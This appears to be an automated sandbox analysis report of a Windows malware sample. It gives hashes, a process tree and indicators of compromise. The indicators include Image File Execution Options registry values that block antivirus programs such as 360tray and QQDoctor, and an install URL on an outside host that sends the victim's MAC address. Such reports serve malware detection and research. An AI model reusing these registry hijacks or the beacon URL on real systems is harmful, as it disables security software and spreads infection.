Analysis
max time kernel: 150s
max time network: 127s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 08/07/2024, 03:50
Static task static1
Behavioral task behavioral1: sample 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe, resource win7-20240704-en
Behavioral task behavioral2: sample 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe, resource win10v2004-20240508-en
General
Target: 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Size: 45KB
MD5: 2ae1676267039c16727bf25f624c51a0
SHA1: e86fdb3e58645365b4472131790c23de0ec56cb1
SHA256: cc91d838372d82e789e05698467ef34d6491d5b6fcf3450a3a16668068374394
SHA512: 64339d1c89e8f91b088d94d367aa45afa2cb7af429262301e39b065c6b3faca5044fc709ba8aaa5cc169891d75caf78b574c5f370fe7333519bfb237e91331ac
SSDEEP: 768:rMVvp3w/ZKldEsWiZ0ggt4rbRtoDLtpehEX8bJrcnwSKQdd6Mr2SWxb/zrFJnlQp:rMVvp3w/4SsWs3rsDLtpsJ1XQPrijMko
Malware Config
Signatures
Event Triggered Execution: Image File Execution Options Injection (1 TTPs, 12 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Drops file in Windows directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\win.ini | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Modifies Internet Explorer settings
description | ioc | Process
All keys below are under \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer
Key created | LowRegistry\DOMStorage | iexplore.exe
Key created | Toolbar | iexplore.exe
Key created | Main | IEXPLORE.EXE
Set value (int) | TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Key created | LowRegistry | iexplore.exe
Key created | Recovery\AdminActive | iexplore.exe
Set value (int) | Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | SearchScopes\DownloadRetries = "2" | iexplore.exe
Key created | BrowserEmulation\LowMic | iexplore.exe
Key created | IETld\LowMic | iexplore.exe
Key created | Toolbar\WebBrowser | iexplore.exe
Set value (int) | Recovery\PendingRecovery\AdminActive = "1" | iexplore.exe
Set value (int) | MINIE\TabBandWidth = "500" | iexplore.exe
Key created | SearchScopes | iexplore.exe
Key created | Main | iexplore.exe
Key created | GPU | iexplore.exe
Key created | IntelliForms | iexplore.exe
Key created | Zoom | iexplore.exe
Set value (int) | Recovery\AdminActive\{093B9A21-3D14-11EF-80D8-CEBD2182E735} = "0" | iexplore.exe
Set value (data) | Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Key created | TabbedBrowsing | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\LastProcessed = 5027c3e220d1da01 | iexplore.exe
Key created | PageSetup | iexplore.exe
Key created | Main\WindowsSearch | iexplore.exe
Set value (str) | Main\FullScreen = "no" | iexplore.exe
Key created | LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
Key created | Recovery\PendingRecovery | iexplore.exe
Key created | TabbedBrowsing\NewTabPage | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\MFV = (value elided) | iexplore.exe
Key created | InternetRegistry | iexplore.exe
Set value (int) | Main\CompatibilityFlags = "0" | iexplore.exe
Set value (str) | Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Key created | MINIE | iexplore.exe
Set value (data) | TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb7c5835718279428690b074aa627b7000000000020000000000106600000001000020000000a9a53936731d36f122f0ca32d368c23ac439a6a455a9f0ace4116406857d4c73000000000e8000000002000020000000994eac22f3ac78093de428c290d476fb573bd26d3cd84cc5d50a88a1037007c22000000014f82adad2040c6da429de21afbb990d25bf10a14f896e80420079d97e64fee540000000614015070f0a2f1add96d7b8b8c6204a9b1131cb172959a3416db6fa6b549e490a1a6afd337aba2c3bfc7d636852cd8eacb5c6a7bd4a4d0babbbafa301bff13a | iexplore.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
pid | Process
1368 | iexplore.exe
2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe (63 identical rows)
Suspicious use of SendNotifyMessage (64 IoCs)
pid | Process
2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe (64 identical rows)
Suspicious use of SetWindowsHookEx (6 IoCs)
pid | Process
1368 | iexplore.exe
1368 | iexplore.exe
2904 | IEXPLORE.EXE
2904 | IEXPLORE.EXE
2904 | IEXPLORE.EXE
2904 | IEXPLORE.EXE
Suspicious use of WriteProcessMemory (14 IoCs)
description | pid | Process | procid_target
PID 2296 wrote to memory of 1368 | 2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe | 30
PID 2296 wrote to memory of 1368 | 2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe | 30
PID 2296 wrote to memory of 1368 | 2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe | 30
PID 2296 wrote to memory of 1368 | 2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe | 30
PID 1368 wrote to memory of 2904 | 1368 | iexplore.exe | 31
PID 1368 wrote to memory of 2904 | 1368 | iexplore.exe | 31
PID 1368 wrote to memory of 2904 | 1368 | iexplore.exe | 31
PID 1368 wrote to memory of 2904 | 1368 | iexplore.exe | 31
PID 2296 wrote to memory of 1300 | 2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe | 21
PID 2296 wrote to memory of 1300 | 2296 | 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe | 21
PID 1368 wrote to memory of 2248 | 1368 | iexplore.exe | 33
PID 1368 wrote to memory of 2248 | 1368 | iexplore.exe | 33
PID 1368 wrote to memory of 2248 | 1368 | iexplore.exe | 33
PID 1368 wrote to memory of 2248 | 1368 | iexplore.exe | 33
Processes
Level 1: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 1300
  Level 2: C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe"
    - Event Triggered Execution: Image File Execution Options Injection
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID: 2296
    Level 3: C:\program files\internet explorer\iexplore.exe
      Command line: "C:\program files\internet explorer\iexplore.exe" "http://www.qqqt8.cn/bw/install.asp?ver=081129&tgid=huiqu&address=CE-BD-21-82-E7-35&regk=1&flag=8895437f50e74f5479b26009b0c74aee&frandom=5035"
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 1368
      Level 4: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:275457 /prefetch:2
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
        PID: 2904
      Level 4: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:4142087 /prefetch:2
        PID: 2248
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: e0d57d309318d80e9ea156f13043d6a7
SHA1: 51c613cc1727e7d710d72e975d8499490687501f
SHA256: 55f1a810337998bff9f78e873cd2658b1e216e137439d3e0e0d61fdec89290e0
SHA512: 4b7c50c10f3aa6ca007d7c05ecb68b30d2121c9e080ee8279404e6c45744bf63c6abe6a4da4ef87c93323d78e45ca1347eb482abb00f4681573ac9935831cf64

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: 6d56eb6b8c3bc6e688a1518aeceb8891
SHA1: 532e263ce3a0521f69874687435b76e42c96e4e0
SHA256: 322432ed2bcf6b9f257bce76fabaa32c9434e11fdea3db659c763c6035960fb3
SHA512: 6517c21fdd466bfdf33d5ab238cab60e5307ea1bcd516adee0eb3e4d35021538146d0a4f2e9d9e04dfa34c4fc6e315e2c287d6525f5fe8e80fbdcf86aeaa01dc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: 09063d3692ace5e7ef4c80426ae95e90
SHA1: ed2adec43e291545670e2046742485fc62045e22
SHA256: d65d45b327afb49f6c4d60996bef8f2240e2dd672eb513b37f8e413be19cfb74
SHA512: 12ddfd9817273be7ae75042763e8e43fe18e2b4df488b2f89588677ab802fbab748b55f4d320c01dca8332a502bba4f4f4a93329a9dc1a49954fcb417710d7ca

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: 8579503d312f83c033e03b5621a1313b
SHA1: 17295269ead1a235612932924ad48e2b0c8037cb
SHA256: 2b97588ea216cbe1acb7989834181cf89d864256dac730516995099007e4d210
SHA512: 750738cf2ea6e9f23082758d78b45291308e6a9650392efc26b2b5021764ad025cbb5f591f1e84fadd8a1f6a1e56e6c12b0a5a4e12f55c610ca7011616ffad2b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: 9a0ac6c234c4ba3404298b8be7f17177
SHA1: d582cbb41a6e2c8c874e79410700c8a906faa0e5
SHA256: cdcfd71e9ad493d55e40c5f2a51fd000dddcc2f1cd798a3561b87c6ec836c6d5
SHA512: b17e4dbde539322fc4965049c5bf923f63ea4b252358ccade312411e1df5e90d9d0b935896795b2c072fccd21e596599854d6ba60bce21d7c2414226629c43c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: e80075edafd889eb09f73441bfd6b9f2
SHA1: d372499f3b57e5ea862b27ee9eb73cc58df48bd8
SHA256: a5b0ba292474380e1cf2bafcacb5ab5439821e9e3e4eb66d753e9860819dd2b0
SHA512: ae626c51249b0025f299e1285b2d673ee5151a39abcabfeaa6c1a154b0428b1803ad8d2884eb35b5162cd6abcf088884a2682e2dccf23c0a47e3ff01cf67ef88

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: d82b4a047ad5364bbe4c65097d6a11cb
SHA1: 48a9648d12ddad3766b68c6ffb2ad971c5d61ecb
SHA256: 3aa00771a2a62daf0e46b575ec3e265c5aebdacfecb67a534247d15ee593baba
SHA512: 6ff6e41ec7c0ed10ec156d82ed76b90c892d5b300ae5c4fc97640e7c71c81df64eed5fe66031586bd68d19ceef2a5d8506df65b2b684b97924fa237282d416d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: cddff437127d0c6356ce22930a8c7ff3
SHA1: e84a110ec9d11ec96ff2ea99e4c6760b6f8f53cf
SHA256: c9fd431aca584348966511c351682b477d81d3b1c38237c61b9eee84ee4f55c5
SHA512: ed2624c0e559e854385871bed1675075eb16c0a9e243421c9529b5b21213fd472a932c414374698d2b5e51d656487896dd0c7a168725bcc7f9a57d8a5f66da57

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: a8462c4bbfe8f14b32c43e139fa23fd2
SHA1: 8a1253aea01789c6980a74d62dec296c9dee64f2
SHA256: ccb3d57793283c60c2b3f559534c3eb2262b839e1495f0dc1848423368bf9be7
SHA512: 0623cf2c9e409cbb671204185c6c609b438ec84d483ea3cd429dbe1f56b73b9d31c947f8911521ca2c76c731ff4d0edf0b76c7db20a443a99dd21bc7cf465937

Filesize: 70KB
MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1: 1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Filesize: 181KB
MD5: 4ea6026cf93ec6338144661bf1202cd1
SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Filesize: 16KB
MD5: c81638cbafbedae275a900b540b80656
SHA1: dcd195f08c84c4629e7c01d4eeacad8170a51ca2
SHA256: 058965f656f41cc7dcb273e7693a9ffe0a12bf7fdb2221d756647f2ce967eb21
SHA512: aa1123beff378cd5cc00371cd229ebbc28081da410f76cc42fb4b97d388996f078f5f4cdfb9a4991c36dc1c473d50ff75e4d5c8b6c654cdfa2d57097d4ff9d85